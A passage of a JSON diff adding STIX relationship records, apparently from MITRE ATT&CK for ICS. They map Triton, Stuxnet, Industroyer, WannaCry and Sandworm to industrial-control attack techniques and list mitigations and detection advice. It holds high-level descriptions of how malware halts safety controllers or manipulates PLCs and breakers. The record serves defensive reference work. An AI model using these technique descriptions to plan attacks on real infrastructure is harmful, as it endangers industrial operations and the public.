"relationship--74b66248-2cb6-46ea-b52c-c7d60c170f3f", + "created": "2018-04-18T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "MDudek-ICS", + "description": "MDudek-ICS TRISIS-TRITON-HATMAN Retrieved. 2019/11/03 ", + "url": "https://github.com/MDudek-ICS/TRISIS-TRITON-HATMAN/tree/master/decompiled_code/library" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:26:26.552Z", + "description": "[Triton](https://attack.mitre.org/software/S1009) has the ability to halt or run a program through the TriStation protocol. TsHi.py contains instances of halt and run functions being executed. (Citation: MDudek-ICS)", + "relationship_type": "uses", + "source_ref": "malware--80099a91-4c86-4bea-9ccb-dac55d61960e", + "target_ref": "attack-pattern--2883c520-7957-46ca-89bd-dab1ad53b601", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--42ab7d24-8286-4a7a-8cd7-02e54a80e13f", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.185Z", + "relationship_type": "mitigates", + "description": "Ensure permissions restrict project file access to only engineer and technician user groups and accounts.\n", + "source_ref": "course-of-action--f9fcb3ec-6de0-4559-8cd9-ef1c0c7d1971", + "target_ref": "attack-pattern--e72425f8-9ae6-41d3-bfdb-e1b865e60722", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--d2addaa7-0fdf-44e3-9b20-c63b2b4179af", + "created": "2022-09-27T16:08:15.473Z", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T16:08:15.473Z", + "description": "Monitor device application logs that indicate the program has changed, although not all devices produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--fc5fda7e-6b2c-4457-b036-759896a2efa2", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--e18af08c-3953-4b1d-b46c-45572fdb5187", + "created": "2022-05-11T16:22:58.804Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-27T19:02:08.013Z", + "description": "Monitor operational data for indicators of temporary data loss which may indicate a Denial of Service. This will not directly detect the technique’s execution, but instead may provide additional evidence that the technique has been used and may complement other detections.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--931b3fc6-ad68-42a8-9018-e98515eedc95", + "target_ref": "attack-pattern--1b22b676-9347-4c55-9a35-ef0dc653db5b", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--520aad6a-2483-45bc-a172-2417137f6ca0", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.143Z", + "relationship_type": "mitigates", + "description": "Utilize out-of-band communication to validate the integrity of data from the primary channel.\n", + "source_ref": "course-of-action--b11cad63-ef30-4eb8-af0d-6cc46eef3f3e", + "target_ref": "attack-pattern--1af9e3fd-2bcc-414d-adbd-fe3b95c02ca1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--c63c35c2-a402-4d0d-bf25-f48eb9b379c1", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T14:26:20.823Z", + "description": "Spoofed reporting messages may be detected by reviewing the content of automation protocols, either through detecting based on expected values or comparing to other out of band process data sources. Spoofed messages may not precisely match legitimate messages which may lead to malformed traffic, although traffic may be malformed for many benign reasons. Monitor reporting messages for changes in how they are constructed.\n\nVarious techniques enable spoofing a reporting message. Consider monitoring for [Rogue Master](https://attack.mitre.org/techniques/T0848) and [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T0830) activity.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--3772e279-27d6-477a-9fe3-c6beb363594c", + "target_ref": "attack-pattern--8535b71e-3c12-4258-a4ab-40257a1becc4", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--f45c2df8-30e7-45d0-8067-7b2870767574", + "created": "2020-09-21T17:59:24.739Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2023-03-08T22:28:22.574Z", + "description": "All field controllers should require users to authenticate for all remote or local management sessions. The authentication mechanisms should also support [Account Use Policies](https://attack.mitre.org/mitigations/M0936), [Password Policies](https://attack.mitre.org/mitigations/M0927), and [User Account Management](https://attack.mitre.org/mitigations/M0918).", + "relationship_type": "mitigates", + "source_ref": "course-of-action--66cfe23e-34b6-4583-b178-ed6a412db2b0", + "target_ref": "attack-pattern--3067b85e-271e-4bc5-81ad-ab1a81d411e3", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--d50a3d89-c8fa-4c5d-813e-f4495d892d1a", + "created": "2019-03-25T19:13:54.947Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Joe Slowik April 2019", + "description": "Joe Slowik 2019, April 10 Implications of IT Ransomware for ICS Environments Retrieved. 2019/10/27 ", + "url": "https://dragos.com/blog/industry-news/implications-of-it-ransomware-for-ics-environments/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T18:32:23.717Z", + "description": "[WannaCry](https://attack.mitre.org/software/S0366) can move laterally through industrial networks by means of the SMB service. (Citation: Joe Slowik April 2019)", + "relationship_type": "uses", + "source_ref": "malware--75ecdbf1-c2bb-4afc-a3f9-c8da4de8c661", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--56672ea4-cbf0-4a3e-8aed-edcc7d33133b", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.075Z", + "relationship_type": "mitigates", + "description": "Segment operational assets and their management devices based on their functional role within the process. Enabling more strict isolation to more critical control and operational information within the control environment. (Citation: Karen Scarfone; Paul Hoffman September 2009) (Citation: Keith Stouffer May 2015) (Citation: Department of Homeland Security September 2016) (Citation: Dwight Anderson 2014) \n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--8e7089d3-fba2-44f8-94a8-9a79c53920c4", + "external_references": [ + { + "source_name": "Karen Scarfone; Paul Hoffman September 2009", + "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 2020/09/25 ", + "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "Dwight Anderson 2014", + "description": "Dwight Anderson 2014 Protect Critical Infrastructure Systems With Whitelisting Retrieved. 2020/09/25 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/protect-critical-infrastructure-systems-whitelisting-35312" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--3e956d93-e011-40de-ab1b-3f32fa73ae41", + "created": "2022-09-26T19:30:14.122Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:15:05.195Z", + "description": "Monitor DLL file events, specifically creation of these files as well as the loading of DLLs into processes specifically designed to accept remote connections, such as RDP, Telnet, SSH, and VNC.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--c0a4a086-cc20-4e1e-b7cb-29d99dfa3fb1", + "target_ref": "attack-pattern--e1f9cdd2-9511-4fca-90d7-f3e92cfdd0bf", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--641813ea-66a9-4949-848f-db83420aac39", + "created": "2021-04-11T14:06:54.109Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016", + "description": "Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems 2016, March 18 Analysis of the Cyber Attack on the Ukranian Power Grid: Defense Use Case Retrieved. 2018/03/27 ", + "url": "https://assets.contentstack.io/v3/assets/blt36c2e63521272fdc/blt6a77276749b76a40/607f235992f0063e5c070fff/E-ISAC_SANS_Ukraine_DUC_5%5b73%5d.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T16:56:04.784Z", + "description": "In the Ukraine 2015 Incident, [Sandworm Team](https://attack.mitre.org/groups/G0034) issued unauthorized commands to substation breakers after gaining control of operator workstations and accessing a distribution management system (DMS) client application. (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "attack-pattern--40b300ba-f553-48bf-862e-9471b220d455", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c6562519-81c5-4eca-a815-f46ac0ed4bcc", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.070Z", + "relationship_type": "mitigates", + "description": "Utilize network allowlists to restrict unnecessary connections to network devices (e.g., comm servers, serial to ethernet converters) and services, especially in cases when devices have limits on the number of simultaneous sessions they support.\n", + "source_ref": "course-of-action--aadac250-bcdc-44e3-a4ae-f52bd0a7a16a", + "target_ref": "attack-pattern--008b8f56-6107-48be-aa9f-746f927dbb61", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--97df42a5-e6d3-4fb7-a158-c161d14624ab", + "created": "2022-05-11T16:22:58.806Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T16:59:40.539Z", + "description": "Monitor device application logs parameter changes, although not all devices will produce such logs.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--097924ce-a9a9-4039-8591-e0deedfb8722", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--ebc34374-2dee-4dc1-b0b7-f31ae94dab11", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.175Z", + "relationship_type": "mitigates", + "description": "Protocols used for device management should authenticate all network messages to prevent unauthorized system changes.\n", + "source_ref": "course-of-action--c7257b6e-4159-4771-b1f3-2bb93adaecac", + "target_ref": "attack-pattern--be69c571-d746-4b1f-bdd0-c0c9817e9068", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--d6a8b25c-53d4-4df1-8728-20ed4ba5ddab", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T16:31:22.665Z", + "description": "Monitor for any attempts to enable scripts running on a system would be considered suspicious. If scripts are not commonly used on a system, but enabled, scripts running out of cycle from patching or other administrator functions are suspicious. Scripts should be captured from the file system when possible to determine their actions and intent.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9f387817-df83-432a-b56b-a8fb7f71eedd", + "target_ref": "attack-pattern--2dc2b567-8821-49f9-9045-8740f3d0b958", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--19ab6776-42de-48af-975a-568d31a3bb66", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.152Z", + "relationship_type": "mitigates", + "description": "Segment operational network and systems to restrict access to critical system functions to predetermined management systems. (Citation: Department of Homeland Security September 2016) (Citation: N/A)\n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--e5de767e-f513-41cd-aa15-33f6ce5fbf92", + "external_references": [ + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "N/A", + "description": "N/A Department of Homeland Security 2016, September Retrieved. 2020/09/25 Alarm Management for Process Control Retrieved. 2020/09/25 ", + "url": "https://www.exida.com/images/uploads/18492275-Alarm-Management-for-Process-Control.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--841ec349-0f4c-43fa-89b8-ef3656497fc9", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Anton Cherepanov, ESET June 2017", + "description": "Anton Cherepanov, ESET 2017, June 12 Win32/Industroyer: A new threat for industrial control systems Retrieved. 2017/09/15 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-23T18:49:11.920Z", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) contains an IEC 61850 module that enumerates all connected network adapters to determine their TCP/IP subnet masks. (Citation: Anton Cherepanov, ESET June 2017)", + "relationship_type": "uses", + "source_ref": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "target_ref": "attack-pattern--ea0c980c-5cf0-43a7-a049-59c4c207566e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--b1768154-221c-48be-ab2b-549ec1eddafb", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.068Z", + "relationship_type": "mitigates", + "description": "Segment operational assets and their management devices based on their functional role within the process. Enabling more strict isolation to more critical control and operational information within the control environment. (Citation: Karen Scarfone; Paul Hoffman September 2009) (Citation: Keith Stouffer May 2015) (Citation: Department of Homeland Security September 2016) (Citation: Dwight Anderson 2014) \n", + "source_ref": "course-of-action--1e7ccfc0-94c8-496e-8d27-032120892291", + "target_ref": "attack-pattern--2900bbd8-308a-4274-b074-5b8bde8347bc", + "external_references": [ + { + "source_name": "Karen Scarfone; Paul Hoffman September 2009", + "description": "Karen Scarfone; Paul Hoffman 2009, September Guidelines on Firewalls and Firewall Policy Retrieved. 2020/09/25 ", + "url": "https://nvlpubs.nist.gov/nistpubs/Legacy/SP/nistspecialpublication800-41r1.pdf" + }, + { + "source_name": "Keith Stouffer May 2015", + "description": "Keith Stouffer 2015, May Guide to Industrial Control Systems (ICS) Security Retrieved. 2018/03/28 ", + "url": "https://nvlpubs.nist.gov/nistpubs/SpecialPublications/NIST.SP.800-82r2.pdf" + }, + { + "source_name": "Department of Homeland Security September 2016", + "description": "Department of Homeland Security 2016, September Retrieved. 2020/09/25 ", + "url": "https://us-cert.cisa.gov/sites/default/files/recommended_practices/NCCIC_ICS-CERT_Defense_in_Depth_2016_S508C.pdf" + }, + { + "source_name": "Dwight Anderson 2014", + "description": "Dwight Anderson 2014 Protect Critical Infrastructure Systems With Whitelisting Retrieved. 2020/09/25 ", + "url": "https://www.sans.org/reading-room/whitepapers/ICS/protect-critical-infrastructure-systems-whitelisting-35312" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "id": "relationship--ce64ed04-f0ff-4897-b636-3177c9c5d9bb", + "type": "relationship", + "created": "2021-01-20T21:03:13.436Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "US District Court Indictment GRU Unit 74455 October 2020", + "url": "https://www.justice.gov/opa/press-release/file/1328521/download", + "description": "Scott W. Brady. (2020, October 15). United States vs. Yuriy Sergeyevich Andrienko et al.. Retrieved November 25, 2020." + }, + { + "source_name": "Secureworks IRON VIKING ", + "url": "https://www.secureworks.com/research/threat-profiles/iron-viking", + "description": "Secureworks. (2020, May 1). IRON VIKING Threat Profile. Retrieved June 10, 2020." + } + ], + "modified": "2022-02-28T17:02:50.467Z", + "description": "(Citation: US District Court Indictment GRU Unit 74455 October 2020)(Citation: Secureworks IRON VIKING )", + "relationship_type": "uses", + "source_ref": "intrusion-set--381fcf73-60f6-4ab2-9991-6af3cbc35192", + "target_ref": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "x_mitre_version": "1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--29b85313-645b-4fb1-b5c2-f580d111760b", + "created": "2022-09-26T19:38:04.844Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:36:50.910Z", + "description": "Monitor HKLM\\Software\\Policies\\Microsoft\\Windows NT\\DNSClient for changes to the \"EnableMulticast\" DWORD value. A value of \"0\" indicates LLMNR is disabled.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--da85d358-741a-410d-9433-20d6269a6170", + "target_ref": "attack-pattern--9a505987-ab05-4f46-a9a6-6441442eec3b", + "x_mitre_deprecated": false, + "x_mitre_version": "0.1", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "relationship", + "id": "relationship--c69eab3c-861c-45f5-8858-a595fcc7e6f6", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "created": "2020-09-21T17:59:24.739Z", + "modified": "2022-05-06T17:47:24.132Z", + "relationship_type": "mitigates", + "description": "Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known tools and protocols like FTP can be used to mitigate activity at the network level. Signatures are often for unique indicators within protocols and may be based on the specific obfuscation technique used by a particular adversary or tool and will likely be different across various malware families and versions. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools. (Citation: Gardiner, J., Cova, M., Nagaraja, S February 2014)\n", + "source_ref": "course-of-action--3172222b-4983-43f7-8983-753ded4f13bc", + "target_ref": "attack-pattern--ead7bd34-186e-4c79-9a4d-b65bcce6ed9d", + "external_references": [ + { + "source_name": "Gardiner, J., Cova, M., Nagaraja, S February 2014", + "description": "Gardiner, J., Cova, M., Nagaraja, S 2014, February Command & Control Understanding, Denying and Detecting Retrieved. 2016/04/20 ", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_version": "1.0" + }, + { + "type": "relationship", + "id": "relationship--cfcbca89-8912-40c0-ac15-47882162b132", + "created": "2022-05-11T16:22:58.808Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-26T19:00:16.899Z", + "description": "Monitor application logs for new or unexpected devices or sessions on wireless networks.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9c2fa0ae-7abc-485a-97f6-699e3b6cf9fa", + "target_ref": "attack-pattern--2877063e-1851-48d2-bcc6-bc1d2733157e", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--bc383819-2e40-49b4-bea9-95eb5d418877", + "created": "2017-12-14T16:46:06.044Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Nicolas Falliere, Liam O Murchu, Eric Chien February 2011", + "description": "Nicolas Falliere, Liam O Murchu, Eric Chien 2011, February W32.Stuxnet Dossier (Version 1.4) Retrieved. 2017/09/22 ", + "url": "https://www.wired.com/images_blogs/threatlevel/2011/02/Symantec-Stuxnet-Update-Feb-2011.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-09-20T21:15:38.341Z", + "description": "[Stuxnet](https://attack.mitre.org/software/S0603) uses a thread to monitor a data block DB890 of sequence A or B. This thread is constantly running and probing this block (every 5 minutes). On an infected PLC, if block DB890 is found and contains a special magic value (used by Stuxnet to identify his own block DB890), this blocks data can be read and written. This thread is likely used to optimize the way sequences A and B work, and modify their behavior when the Step7 editor is opened. (Citation: Nicolas Falliere, Liam O Murchu, Eric Chien February 2011)", + "relationship_type": "uses", + "source_ref": "malware--088f1d6e-0783-47c6-9923-9c79b2af43d4", + "target_ref": "attack-pattern--e076cca8-2f08-45c9-aff7-ea5ac798b387", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--51f9963c-c041-4bec-b482-5fda2fb5bca4", + "created": "2019-06-24T17:20:24.258Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "Catalin Cimpanu April 2016", + "description": "Catalin Cimpanu 2016, April 26 Malware Shuts Down German Nuclear Power Plant on Chernobyl's 30th Anniversary Retrieved. 2019/10/14 ", + "url": "https://news.softpedia.com/news/on-chernobyl-s-30th-anniversary-malware-shuts-down-german-nuclear-power-plant-503429.shtml" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-12T17:39:25.984Z", + "description": "A [Conficker](https://attack.mitre.org/software/S0608) infection at a nuclear power plant forced the facility to shutdown and go through security procedures involved with such events, with its staff scanning computer systems and going through all the regular checks and motions before putting the plant back into production. (Citation: Catalin Cimpanu April 2016)", + "relationship_type": "uses", + "source_ref": "malware--58eddbaf-7416-419a-ad7b-e65b9d4c3b55", + "target_ref": "attack-pattern--63b6942d-8359-4506-bfb3-cf87aa8120ee", + "x_mitre_deprecated": false, + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "type": "relationship", + "id": "relationship--c11a95c2-6e9d-4d90-b6ab-20227869f2e4", + "created": "2022-05-11T16:22:58.807Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "CopyFromScreen .NET", + "description": "Microsoft. (n.d.). Graphics.CopyFromScreen Method. Retrieved March 24, 2020.", + "url": "https://docs.microsoft.com/en-us/dotnet/api/system.drawing.graphics.copyfromscreen?view=netframework-4.8" + }, + { + "source_name": "Antiquated Mac Malware", + "description": "Thomas Reed. (2017, January 18). New Mac backdoor using antiquated code. Retrieved July 5, 2017.", + "url": "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "modified": "2022-10-14T19:38:15.307Z", + "description": "Monitoring for screen capture behavior will depend on the method used to obtain data from the operating system and write output files. Detection methods could include collecting information from unusual processes using API calls used to obtain image data, and monitoring for image files written to disk, such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated Mac Malware) The data may need to be correlated with other events to identify malicious activity, depending on the legitimacy of this behavior within a given network environment.", + "relationship_type": "detects", + "source_ref": "x-mitre-data-component--9bde2f9d-a695-4344-bfac-f2dce13d121e", + "target_ref": 